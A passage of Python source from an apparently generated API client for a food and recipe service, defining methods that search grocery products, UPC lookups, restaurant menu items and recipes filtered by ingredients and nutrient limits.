    :param async_req bool
    :param str query: The search query. (required)
    :param float min_calories: The minimum amount of calories the product must have.
    :param float max_calories: The maximum amount of calories the product can have.
    :param float min_carbs: The minimum amount of carbohydrates in grams the product must have.
    :param float max_carbs: The maximum amount of carbohydrates in grams the product can have.
    :param float min_protein: The minimum amount of protein in grams the product must have.
    :param float max_protein: The maximum amount of protein in grams the product can have.
    :param float min_fat: The minimum amount of fat in grams the product must have.
    :param float max_fat: The maximum amount of fat in grams the product can have.
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.search_grocery_products_with_http_info(query, **kwargs)  # noqa: E501
def search_grocery_products_with_http_info(self, query, **kwargs):  # noqa: E501
    """Search Grocery Products.

    Search packaged food products, such as frozen pizza or Greek yogurt.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_grocery_products_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param float min_calories: The minimum amount of calories the product must have.
    :param float max_calories: The maximum amount of calories the product can have.
    :param float min_carbs: The minimum amount of carbohydrates in grams the product must have.
    :param float max_carbs: The maximum amount of carbohydrates in grams the product can have.
    :param float min_protein: The minimum amount of protein in grams the product must have.
    :param float max_protein: The maximum amount of protein in grams the product can have.
    :param float min_fat: The minimum amount of fat in grams the product must have.
    :param float max_fat: The maximum amount of fat in grams the product can have.
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Capture self/query/kwargs; validated kwargs are folded in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, endpoint params first, then the
    # client-internal control keywords.
    all_params = [
        'query', 'min_calories', 'max_calories', 'min_carbs', 'max_carbs',
        'min_protein', 'max_protein', 'min_fat', 'max_fat', 'offset',
        'number',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_grocery_products" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if ('query' not in local_var_params or
            local_var_params['query'] is None):
        raise ApiValueError("Missing the required parameter `query` when calling `search_grocery_products`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Map the python_case keyword names onto the API's camelCase query
    # string names; only keywords the caller actually supplied are sent.
    _query_name_map = [
        ('query', 'query'),
        ('min_calories', 'minCalories'),
        ('max_calories', 'maxCalories'),
        ('min_carbs', 'minCarbs'),
        ('max_carbs', 'maxCarbs'),
        ('min_protein', 'minProtein'),
        ('max_protein', 'maxProtein'),
        ('min_fat', 'minFat'),
        ('max_fat', 'maxFat'),
        ('offset', 'offset'),
        ('number', 'number'),
    ]
    query_params = [
        (api_name, local_var_params[py_name])
        for py_name, api_name in _query_name_map
        if py_name in local_var_params
    ]

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']

    return self.api_client.call_api(
        '/food/products/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_grocery_products_by_upc(self, upc, **kwargs):  # noqa: E501
    """Search Grocery Products by UPC.

    Get information about a packaged food using its UPC.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_grocery_products_by_upc(upc, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float upc: The product's UPC. (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Always hand callers just the deserialized payload; whether the call
    # is sync or async, the delegate's return value is forwarded as-is.
    kwargs['_return_http_data_only'] = True
    return self.search_grocery_products_by_upc_with_http_info(upc, **kwargs)  # noqa: E501
def search_grocery_products_by_upc_with_http_info(self, upc, **kwargs):  # noqa: E501
    """Search Grocery Products by UPC.

    Get information about a packaged food using its UPC.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_grocery_products_by_upc_with_http_info(upc, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float upc: The product's UPC. (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Capture self/upc/kwargs; validated kwargs are folded in below.
    local_var_params = locals()

    # Accepted keywords: the endpoint parameter plus the client-internal
    # control keywords.
    all_params = [
        'upc',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_grocery_products_by_upc" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'upc' is set
    if ('upc' not in local_var_params or
            local_var_params['upc'] is None):
        raise ApiValueError("Missing the required parameter `upc` when calling `search_grocery_products_by_upc`")  # noqa: E501

    collection_formats = {}

    # `upc` is interpolated into the URL path, not sent as a query param.
    path_params = {}
    if 'upc' in local_var_params:
        path_params['upc'] = local_var_params['upc']

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']

    return self.api_client.call_api(
        '/food/products/upc/{upc}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_menu_items(self, query, **kwargs):  # noqa: E501
    """Search Menu Items.

    Search over 115,000 menu items from over 800 fast food and chain
    restaurants. For example, McDonald's Big Mac or Starbucks Mocha.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_menu_items(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param float min_calories: The minimum amount of calories the menu item must have.
    :param float max_calories: The maximum amount of calories the menu item can have.
    :param float min_carbs: The minimum amount of carbohydrates in grams the menu item must have.
    :param float max_carbs: The maximum amount of carbohydrates in grams the menu item can have.
    :param float min_protein: The minimum amount of protein in grams the menu item must have.
    :param float max_protein: The maximum amount of protein in grams the menu item can have.
    :param float min_fat: The minimum amount of fat in grams the menu item must have.
    :param float max_fat: The maximum amount of fat in grams the menu item can have.
    :param float offset: The offset number for paging (between 0 and 990).
    :param float number: The number of expected results (between 1 and 10).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Always hand callers just the deserialized payload; whether the call
    # is sync or async, the delegate's return value is forwarded as-is.
    kwargs['_return_http_data_only'] = True
    return self.search_menu_items_with_http_info(query, **kwargs)  # noqa: E501
def search_menu_items_with_http_info(self, query, **kwargs):  # noqa: E501
    """Search Menu Items.

    Search over 115,000 menu items from over 800 fast food and chain
    restaurants. For example, McDonald's Big Mac or Starbucks Mocha.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_menu_items_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param float min_calories: The minimum amount of calories the menu item must have.
    :param float max_calories: The maximum amount of calories the menu item can have.
    :param float min_carbs: The minimum amount of carbohydrates in grams the menu item must have.
    :param float max_carbs: The maximum amount of carbohydrates in grams the menu item can have.
    :param float min_protein: The minimum amount of protein in grams the menu item must have.
    :param float max_protein: The maximum amount of protein in grams the menu item can have.
    :param float min_fat: The minimum amount of fat in grams the menu item must have.
    :param float max_fat: The maximum amount of fat in grams the menu item can have.
    :param float offset: The offset number for paging (between 0 and 990).
    :param float number: The number of expected results (between 1 and 10).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Capture self/query/kwargs; validated kwargs are folded in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, endpoint params first, then the
    # client-internal control keywords.
    all_params = [
        'query', 'min_calories', 'max_calories', 'min_carbs', 'max_carbs',
        'min_protein', 'max_protein', 'min_fat', 'max_fat', 'offset',
        'number',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_menu_items" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if ('query' not in local_var_params or
            local_var_params['query'] is None):
        raise ApiValueError("Missing the required parameter `query` when calling `search_menu_items`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Map the python_case keyword names onto the API's camelCase query
    # string names; only keywords the caller actually supplied are sent.
    _query_name_map = [
        ('query', 'query'),
        ('min_calories', 'minCalories'),
        ('max_calories', 'maxCalories'),
        ('min_carbs', 'minCarbs'),
        ('max_carbs', 'maxCarbs'),
        ('min_protein', 'minProtein'),
        ('max_protein', 'maxProtein'),
        ('min_fat', 'minFat'),
        ('max_fat', 'maxFat'),
        ('offset', 'offset'),
        ('number', 'number'),
    ]
    query_params = [
        (api_name, local_var_params[py_name])
        for py_name, api_name in _query_name_map
        if py_name in local_var_params
    ]

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']

    return self.api_client.call_api(
        '/food/menuItems/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_recipes(self, query, **kwargs):  # noqa: E501
    """Search Recipes.

    Search through hundreds of thousands of recipes using advanced
    filtering and ranking. NOTE: This method combines searching by query,
    by ingredients, and by nutrients into one endpoint.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_recipes(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The (natural language) recipe search query. (required)
    :param str cuisine: The cuisine(s) of the recipes. One or more, comma separated (will be interpreted as 'OR'). See a full list of supported cuisines.
    :param str exclude_cuisine: The cuisine(s) the recipes must not match. One or more, comma separated (will be interpreted as 'AND'). See a full list of supported cuisines.
    :param str diet: The diet for which the recipes must be suitable. See a full list of supported diets.
    :param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
    :param str equipment: The equipment required. Multiple values will be interpreted as 'or'. For example, value could be \"blender, frying pan, bowl\".
    :param str include_ingredients: A comma-separated list of ingredients that should/must be used in the recipes.
    :param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
    :param str type: The type of recipe. See a full list of supported meal types.
    :param bool instructions_required: Whether the recipes must have instructions.
    :param bool fill_ingredients: Add information about the ingredients and whether they are used or missing in relation to the query.
    :param bool add_recipe_information: If set to true, you get more information about the recipes returned.
    :param bool add_recipe_nutrition: If set to true, you get nutritional information about each recipes returned.
    :param str author: The username of the recipe author.
    :param str tags: User defined tags that have to match. The author param has to be set.
    :param float recipe_box_id: The id of the recipe box to which the search should be limited to.
    :param str title_match: Enter text that must be found in the title of the recipes.
    :param float max_ready_time: The maximum time in minutes it should take to prepare and cook the recipe.
    :param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
    :param str sort: The strategy to sort recipes by. See a full list of supported sorting options.
    :param str sort_direction: The direction in which to sort. Must be either 'asc' (ascending) or 'desc' (descending).
    :param float min_carbs: The minimum amount of carbohydrates in grams the recipe must have.
    :param float max_carbs: The maximum amount of carbohydrates in grams the recipe can have.
    :param float min_protein: The minimum amount of protein in grams the recipe must have.
    :param float max_protein: The maximum amount of protein in grams the recipe can have.
    :param float min_calories: The minimum amount of calories the recipe must have.
    :param float max_calories: The maximum amount of calories the recipe can have.
    :param float min_fat: The minimum amount of fat in grams the recipe must have.
    :param float max_fat: The maximum amount of fat in grams the recipe can have.
    :param float min_alcohol: The minimum amount of alcohol in grams the recipe must have.
    :param float max_alcohol: The maximum amount of alcohol in grams the recipe can have.
    :param float min_caffeine: The minimum amount of caffeine in milligrams the recipe must have.
    :param float max_caffeine: The maximum amount of caffeine in milligrams the recipe can have.
    :param float min_copper: The minimum amount of copper in milligrams the recipe must have.
    :param float max_copper: The maximum amount of copper in milligrams the recipe can have.
    :param float min_calcium: The minimum amount of calcium in milligrams the recipe must have.
    :param float max_calcium: The maximum amount of calcium in milligrams the recipe can have.
    :param float min_choline: The minimum amount of choline in milligrams the recipe must have.
    :param float max_choline: The maximum amount of choline in milligrams the recipe can have.
    :param float min_cholesterol: The minimum amount of cholesterol in milligrams the recipe must have.
    :param float max_cholesterol: The maximum amount of cholesterol in milligrams the recipe can have.
    :param float min_fluoride: The minimum amount of fluoride in milligrams the recipe must have.
    :param float max_fluoride: The maximum amount of fluoride in milligrams the recipe can have.
    :param float min_saturated_fat: The minimum amount of saturated fat in grams the recipe must have.
    :param float max_saturated_fat: The maximum amount of saturated fat in grams the recipe can have.
    :param float min_vitamin_a: The minimum amount of Vitamin A in IU the recipe must have.
    :param float max_vitamin_a: The maximum amount of Vitamin A in IU the recipe can have.
    :param float min_vitamin_c: The minimum amount of Vitamin C milligrams the recipe must have.
    :param float max_vitamin_c: The maximum amount of Vitamin C in milligrams the recipe can have.
    :param float min_vitamin_d: The minimum amount of Vitamin D in micrograms the recipe must have.
    :param float max_vitamin_d: The maximum amount of Vitamin D in micrograms the recipe can have.
    :param float min_vitamin_e: The minimum amount of Vitamin E in milligrams the recipe must have.
    :param float max_vitamin_e: The maximum amount of Vitamin E in milligrams the recipe can have.
    :param float min_vitamin_k: The minimum amount of Vitamin K in micrograms the recipe must have.
    :param float max_vitamin_k: The maximum amount of Vitamin K in micrograms the recipe can have.
    :param float min_vitamin_b1: The minimum amount of Vitamin B1 in milligrams the recipe must have.
    :param float max_vitamin_b1: The maximum amount of Vitamin B1 in milligrams the recipe can have.
    :param float min_vitamin_b2: The minimum amount of Vitamin B2 in milligrams the recipe must have.
    :param float max_vitamin_b2: The maximum amount of Vitamin B2 in milligrams the recipe can have.
    :param float min_vitamin_b5: The minimum amount of Vitamin B5 in milligrams the recipe must have.
    :param float max_vitamin_b5: The maximum amount of Vitamin B5 in milligrams the recipe can have.
    :param float min_vitamin_b3: The minimum amount of Vitamin B3 in milligrams the recipe must have.
    :param float max_vitamin_b3: The maximum amount of Vitamin B3 in milligrams the recipe can have.
    :param float min_vitamin_b6: The minimum amount of Vitamin B6 in milligrams the recipe must have.
    :param float max_vitamin_b6: The maximum amount of Vitamin B6 in milligrams the recipe can have.
    :param float min_vitamin_b12: The minimum amount of Vitamin B12 in micrograms the recipe must have.
    :param float max_vitamin_b12: The maximum amount of Vitamin B12 in micrograms the recipe can have.
    :param float min_fiber: The minimum amount of fiber in grams the recipe must have.
    :param float max_fiber: The maximum amount of fiber in grams the recipe can have.
    :param float min_folate: The minimum amount of folate in micrograms the recipe must have.
    :param float max_folate: The maximum amount of folate in micrograms the recipe can have.
    :param float min_folic_acid: The minimum amount of folic acid in micrograms the recipe must have.
    :param float max_folic_acid: The maximum amount of folic acid in micrograms the recipe can have.
    :param float min_iodine: The minimum amount of iodine in micrograms the recipe must have.
    :param float max_iodine: The maximum amount of iodine in micrograms the recipe can have.
    :param float min_iron: The minimum amount of iron in milligrams the recipe must have.
    :param float max_iron: The maximum amount of iron in milligrams the recipe can have.
    :param float min_magnesium: The minimum amount of magnesium in milligrams the recipe must have.
    :param float max_magnesium: The maximum amount of magnesium in milligrams the recipe can have.
    :param float min_manganese: The minimum amount of manganese in milligrams the recipe must have.
    :param float max_manganese: The maximum amount of manganese in milligrams the recipe can have.
    :param float min_phosphorus: The minimum amount of phosphorus in milligrams the recipe must have.
    :param float max_phosphorus: The maximum amount of phosphorus in milligrams the recipe can have.
    :param float min_potassium: The minimum amount of potassium in milligrams the recipe must have.
    :param float max_potassium: The maximum amount of potassium in milligrams the recipe can have.
    :param float min_selenium: The minimum amount of selenium in micrograms the recipe must have.
    :param float max_selenium: The maximum amount of selenium in micrograms the recipe can have.
    :param float min_sodium: The minimum amount of sodium in milligrams the recipe must have.
    :param float max_sodium: The maximum amount of sodium in milligrams the recipe can have.
    :param float min_sugar: The minimum amount of sugar in grams the recipe must have.
    :param float max_sugar: The maximum amount of sugar in grams the recipe can have.
    :param float min_zinc: The minimum amount of zinc in milligrams the recipe must have.
    :param float max_zinc: The maximum amount of zinc in milligrams the recipe can have.
    :param float offset: The number of results to skip (between 0 and 900).
    :param float number: The number of expected results (between 1 and 100).
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Always hand callers just the deserialized payload; whether the call
    # is sync or async, the delegate's return value is forwarded as-is.
    kwargs['_return_http_data_only'] = True
    return self.search_recipes_with_http_info(query, **kwargs)  # noqa: E501
def search_recipes_with_http_info(self, query, **kwargs):  # noqa: E501
    """Search Recipes  # noqa: E501

    Search through hundreds of thousands of recipes using advanced
    filtering and ranking (GET /recipes/complexSearch).  NOTE: this
    method combines searching by query, by ingredients, and by
    nutrients into one endpoint.

    This method makes a synchronous HTTP request by default; pass
    ``async_req=True`` to receive the request thread instead.

    :param str query: The (natural language) recipe search query. (required)
    :param kwargs: Optional filters, forwarded to the API after being
        renamed from snake_case to camelCase.  Accepted keys are the
        names listed in ``param_order`` below: cuisine / diet /
        intolerance filters, ingredient include/exclude lists,
        per-nutrient min/max bounds, paging controls ``offset``
        (between 0 and 900) and ``number`` (between 1 and 100), and
        ``limit_license``.
    :param bool async_req: Execute the request asynchronously.
    :return: object.  If the method is called asynchronously, returns
        the request thread.
    :raises ApiTypeError: If an unknown keyword argument is supplied.
    :raises ApiValueError: If ``query`` is missing or None.
    """
    local_var_params = locals()  # snapshot of self, query, kwargs

    # Every query parameter the endpoint accepts, in the exact order
    # the request must carry them.  The camelCase wire names are
    # derived mechanically from these snake_case names.
    param_order = [
        'query', 'cuisine', 'exclude_cuisine', 'diet', 'intolerances',
        'equipment', 'include_ingredients', 'exclude_ingredients',
        'type', 'instructions_required', 'fill_ingredients',
        'add_recipe_information', 'add_recipe_nutrition', 'author',
        'tags', 'recipe_box_id', 'title_match', 'max_ready_time',
        'ignore_pantry', 'sort', 'sort_direction',
        'min_carbs', 'max_carbs', 'min_protein', 'max_protein',
        'min_calories', 'max_calories', 'min_fat', 'max_fat',
        'min_alcohol', 'max_alcohol', 'min_caffeine', 'max_caffeine',
        'min_copper', 'max_copper', 'min_calcium', 'max_calcium',
        'min_choline', 'max_choline', 'min_cholesterol',
        'max_cholesterol', 'min_fluoride', 'max_fluoride',
        'min_saturated_fat', 'max_saturated_fat',
        'min_vitamin_a', 'max_vitamin_a', 'min_vitamin_c',
        'max_vitamin_c', 'min_vitamin_d', 'max_vitamin_d',
        'min_vitamin_e', 'max_vitamin_e', 'min_vitamin_k',
        'max_vitamin_k', 'min_vitamin_b1', 'max_vitamin_b1',
        'min_vitamin_b2', 'max_vitamin_b2', 'min_vitamin_b5',
        'max_vitamin_b5', 'min_vitamin_b3', 'max_vitamin_b3',
        'min_vitamin_b6', 'max_vitamin_b6', 'min_vitamin_b12',
        'max_vitamin_b12', 'min_fiber', 'max_fiber', 'min_folate',
        'max_folate', 'min_folic_acid', 'max_folic_acid',
        'min_iodine', 'max_iodine', 'min_iron', 'max_iron',
        'min_magnesium', 'max_magnesium', 'min_manganese',
        'max_manganese', 'min_phosphorus', 'max_phosphorus',
        'min_potassium', 'max_potassium', 'min_selenium',
        'max_selenium', 'min_sodium', 'max_sodium', 'min_sugar',
        'max_sugar', 'min_zinc', 'max_zinc', 'offset', 'number',
        'limit_license',
    ]
    all_params = param_order + [
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keywords, then fold the accepted ones into the
    # parameter snapshot.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_recipes" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # 'query' is the only required parameter.
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `search_recipes`")  # noqa: E501

    def _wire_name(snake):
        # e.g. 'min_vitamin_b12' -> 'minVitaminB12'; single-word names
        # ('query', 'type', ...) pass through unchanged.
        parts = snake.split('_')
        return parts[0] + ''.join(p.capitalize() for p in parts[1:])

    query_params = [
        (_wire_name(name), local_var_params[name])
        for name in param_order
        if name in local_var_params
    ]

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/recipes/complexSearch', 'GET',
        {},  # no path parameters for this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
def search_recipes_by_ingredients(self, ingredients, **kwargs):  # noqa: E501
    """Search Recipes by Ingredients  # noqa: E501

    Find recipes built around the ingredients you already have in your
    fridge or pantry: either maximizing the usage of ingredients at
    hand (pre shopping) or minimizing the ones you are missing (post
    shopping).  # noqa: E501

    This method makes a synchronous HTTP request by default; pass
    ``async_req=True`` to receive the request thread instead.

    >>> thread = api.search_recipes_by_ingredients(ingredients, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredients: A comma-separated list of ingredients that the recipes should contain. (required)
    :param float number: The maximum number of recipes to return (between 1 and 100). Defaults to 10.
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :param float ranking: Whether to maximize used ingredients (1) or minimize missing ingredients (2) first.
    :param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the payload,
    # never the full (data, status, headers) response tuple.
    kwargs['_return_http_data_only'] = True
    delegate = self.search_recipes_by_ingredients_with_http_info
    if kwargs.get('async_req'):
        # Asynchronous call: hand the request thread straight back.
        return delegate(ingredients, **kwargs)  # noqa: E501
    # Synchronous call: return the deserialized response data.
    return delegate(ingredients, **kwargs)  # noqa: E501
def search_recipes_by_ingredients_with_http_info(self, ingredients, **kwargs):  # noqa: E501
    """Search Recipes by Ingredients  # noqa: E501

    Find recipes built around the ingredients you already have in your
    fridge or pantry (GET /recipes/findByIngredients): either
    maximizing the usage of ingredients at hand (pre shopping) or
    minimizing the ones you are missing (post shopping).  # noqa: E501

    This method makes a synchronous HTTP request by default; pass
    ``async_req=True`` to receive the request thread instead.

    :param str ingredients: A comma-separated list of ingredients that the recipes should contain. (required)
    :param float number: The maximum number of recipes to return (between 1 and 100). Defaults to 10.
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :param float ranking: Whether to maximize used ingredients (1) or minimize missing ingredients (2) first.
    :param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
    :param bool async_req: Execute the request asynchronously.
    :return: object.  If the method is called asynchronously, returns
        the request thread.
    :raises ApiTypeError: If an unknown keyword argument is supplied.
    :raises ApiValueError: If ``ingredients`` is missing or None.
    """
    local_var_params = locals()  # snapshot of self, ingredients, kwargs

    all_params = [
        'ingredients', 'number', 'limit_license', 'ranking',
        'ignore_pantry',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keywords, then fold the accepted ones into the
    # parameter snapshot.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_recipes_by_ingredients" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # 'ingredients' is the only required parameter.
    if local_var_params.get('ingredients') is None:
        raise ApiValueError("Missing the required parameter `ingredients` when calling `search_recipes_by_ingredients`")  # noqa: E501

    # (python name, API wire name) pairs, in request order.
    name_map = (
        ('ingredients', 'ingredients'),
        ('number', 'number'),
        ('limit_license', 'limitLicense'),
        ('ranking', 'ranking'),
        ('ignore_pantry', 'ignorePantry'),
    )
    query_params = [
        (wire, local_var_params[name])
        for name, wire in name_map
        if name in local_var_params
    ]

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/recipes/findByIngredients', 'GET',
        {},  # no path parameters for this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
def search_recipes_by_nutrients(self, **kwargs):  # noqa: E501
    """Search Recipes by Nutrients  # noqa: E501

    Find a set of recipes that adhere to the given nutritional limits.
    Limits may be set for macronutrients (calories, protein, fat, and
    carbohydrate) and/or many micronutrients.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_recipes_by_nutrients(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float min_<nutrient> / max_<nutrient>: lower / upper bound the
        recipe must satisfy for a nutrient.  Supported nutrient names:
        carbs, protein, calories, fat, alcohol, caffeine, copper, calcium,
        choline, cholesterol, fluoride, saturated_fat, vitamin_a,
        vitamin_c, vitamin_d, vitamin_e, vitamin_k, vitamin_b1,
        vitamin_b2, vitamin_b5, vitamin_b3, vitamin_b6, vitamin_b12,
        fiber, folate, folic_acid, iodine, iron, magnesium, manganese,
        phosphorus, potassium, selenium, sodium, sugar, zinc.
    :param float offset: The number of results to skip (between 0 and 900).
    :param float number: The number of expected results (between 1 and 100).
    :param bool random: If true, every request will give you a random set of recipes within the requested limits.
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the payload,
    # never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns either the request
    # thread (async_req=True) or the deserialized data, so simply pass
    # its result through.
    return self.search_recipes_by_nutrients_with_http_info(**kwargs)  # noqa: E501
def search_recipes_by_nutrients_with_http_info(self, **kwargs):  # noqa: E501
    """Search Recipes by Nutrients  # noqa: E501

    Find a set of recipes that adhere to the given nutritional limits.
    You may set limits for macronutrients (calories, protein, fat, and
    carbohydrate) and/or many micronutrients.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_recipes_by_nutrients_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float min_<nutrient> / max_<nutrient>: lower / upper bound the
        recipe must satisfy for a nutrient.  Supported nutrient names:
        carbs, protein, calories, fat, alcohol, caffeine, copper, calcium,
        choline, cholesterol, fluoride, saturated_fat, vitamin_a,
        vitamin_c, vitamin_d, vitamin_e, vitamin_k, vitamin_b1,
        vitamin_b2, vitamin_b5, vitamin_b3, vitamin_b6, vitamin_b12,
        fiber, folate, folic_acid, iodine, iron, magnesium, manganese,
        phosphorus, potassium, selenium, sodium, sugar, zinc.
    :param float offset: The number of results to skip (between 0 and 900).
    :param float number: The number of expected results (between 1 and 100).
    :param bool random: If true, every request will give you a random set of recipes within the requested limits.
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    local_var_params = locals()

    # (python_name, API query-string name) pairs, in the order the query
    # string is built.  Driving both the kwarg validation and the query
    # construction from this one table replaces ~160 copy-pasted
    # `if 'x' in local_var_params: query_params.append(('X', ...))`
    # blocks and guarantees the accepted-parameter list can never drift
    # out of sync with the parameters actually sent.
    param_map = [
        ('min_carbs', 'minCarbs'), ('max_carbs', 'maxCarbs'),
        ('min_protein', 'minProtein'), ('max_protein', 'maxProtein'),
        ('min_calories', 'minCalories'), ('max_calories', 'maxCalories'),
        ('min_fat', 'minFat'), ('max_fat', 'maxFat'),
        ('min_alcohol', 'minAlcohol'), ('max_alcohol', 'maxAlcohol'),
        ('min_caffeine', 'minCaffeine'), ('max_caffeine', 'maxCaffeine'),
